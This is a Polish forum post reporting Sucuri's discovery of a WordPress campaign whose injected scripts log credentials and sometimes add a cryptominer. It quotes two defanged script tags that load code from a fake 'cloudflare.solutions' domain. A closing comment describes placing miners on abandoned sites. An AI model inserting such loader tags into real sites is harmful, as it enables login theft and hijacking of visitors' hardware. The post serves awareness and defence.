07.12.2017, 20:11
Na dokładnie
O sprawie poinformowała na swoim blogu firma Sucuri
![[Obrazek: WordPress-site-keylogger.png]](https://www.bleepstatic.com/content/posts/2017/12/07/WordPress-site-keylogger.png)
Źródło
[Aby zobaczyć linki, zarejestruj się tutaj]
zidentyfikowano szkodliwe skrypty, które przechwytują dane logowania i czasem dodatkowo instalują koparkę kryptowaluty.Kod:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >O sprawie poinformowała na swoim blogu firma Sucuri
[Aby zobaczyć linki, zarejestruj się tutaj]
Analiza danych wykazała, że akcja rozpoczęła się jeszcze w kwietniu tego roku, a skrypty ładowane są z domeny "cloudflare.solutions" i nie mają absolutnie nic wspólnego z CloudflareŹródło
[Aby zobaczyć linki, zarejestruj się tutaj]
"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Wstawiłem na kilku swoich stronach z porzuconych projektów koparki do testowania zabezpieczeń i obciążenia sprzętu.